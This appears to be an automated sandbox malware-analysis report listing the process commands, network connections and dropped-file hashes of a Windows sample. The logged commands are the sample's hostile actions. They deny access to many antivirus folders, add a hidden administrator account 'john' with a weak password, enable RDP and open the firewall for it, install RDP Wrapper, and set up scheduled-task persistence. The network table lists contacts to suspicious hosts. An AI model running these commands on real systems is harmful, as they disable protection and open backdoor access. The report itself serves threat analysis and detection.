icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4769.tmp\476A.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| NL | 20.190.160.67:443 | tcp | |
| NL | 20.190.160.67:443 | tcp | |
| NL | 20.190.160.67:443 | tcp | |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| NL | 20.190.160.8:443 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| NL | 20.190.160.8:443 | tcp | |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 52.182.143.208:443 | tcp | |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 20.190.160.2:443 | tcp | |
| NL | 20.190.160.2:443 | tcp | |
| NL | 20.190.160.2:443 | tcp | |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 20.190.160.136:443 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.73:443 | tcp | |
| NL | 20.190.160.71:443 | tcp | |
| NL | 20.190.160.71:443 | tcp | |
| NL | 20.190.160.71:443 | tcp |
Files
memory/2312-130-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
memory/2888-133-0x0000000000000000-mapping.dmp
C:\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
C:\programdata\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
memory/4488-136-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
C:\Programdata\Windows\install.bat
| MD5 | db76c882184e8d2bac56865c8e88f8fd |
| SHA1 | fc6324751da75b665f82a3ad0dcc36bf4b91dfac |
| SHA256 | e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a |
| SHA512 | da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92 |
memory/3640-144-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
C:\programdata\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
C:\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
memory/624-141-0x0000000000000000-mapping.dmp
memory/3596-140-0x0000000000000000-mapping.dmp
memory/2780-139-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
memory/3416-149-0x0000000000000000-mapping.dmp
memory/3016-147-0x0000000000000000-mapping.dmp
memory/4776-151-0x0000000000000000-mapping.dmp
memory/3644-152-0x0000000000000000-mapping.dmp
memory/1276-153-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/864-157-0x0000000000000000-mapping.dmp
C:\programdata\microsoft\intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
